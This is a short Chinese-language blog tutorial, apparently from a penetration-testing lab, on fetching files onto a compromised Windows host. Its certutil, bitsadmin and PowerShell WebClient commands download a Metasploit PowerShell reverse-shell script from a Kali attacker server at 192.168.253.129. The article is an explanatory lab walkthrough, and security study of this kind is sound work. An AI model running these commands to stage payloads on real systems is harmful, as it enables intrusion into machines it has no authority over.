Windows下载远程文件常用方法

文章目录

    • 一、目的
    • 二、环境
    • 三、使用命令
      • 3.1 certutil
      • 3.2 bitsadmin
      • 3.3 powershell

一、目的

  拿到一台Windows主机,需要远程web站点上的文件到本地,可以参考以下方法!

二、环境

提供HTTP服务站点:

  • Kali:192.168.253.129 (kali搭建http服务,以msf生成的powershell payload为测试目标)
    Windows下载远程文件常用方法_第1张图片

下载文件的Windows Server服务器

OS名称
Windows Server 2008 R2 Datacenter
Windows Server 2012 R2 Datacenter

三、使用命令

3.1 certutil

Tips:适用于Server 2003以上版本,以及Windows Server 2003 / 2003 R2,带有SP1/SP2的Windows Server 2003

certutil -urlcache -split -f <站点文件路径>

Windows下载远程文件常用方法_第2张图片

3.2 bitsadmin

Tips:个别系统上拒绝访问添加文件,具体情况真实环境下自行测试

bitsadmin /transfer myDownLoadJob /download /priority normal "http://192.168.253.129/ps_reverse_shell.ps1" "c:\ps_reverse_shell.ps1"

Windows下载远程文件常用方法_第3张图片

3.3 powershell

# 进入powershell
powershell
# 执行
powershell (new-object Net.WebClient).DownloadFile('http://192.168.253.129/ps_reverse_shell.ps1','C:\ps_reverse_shell.ps1')

Windows下载远程文件常用方法_第4张图片

你可能感兴趣的:(文件传输,windows下载文件,文件传输,windows上下载站点文件,文件互传)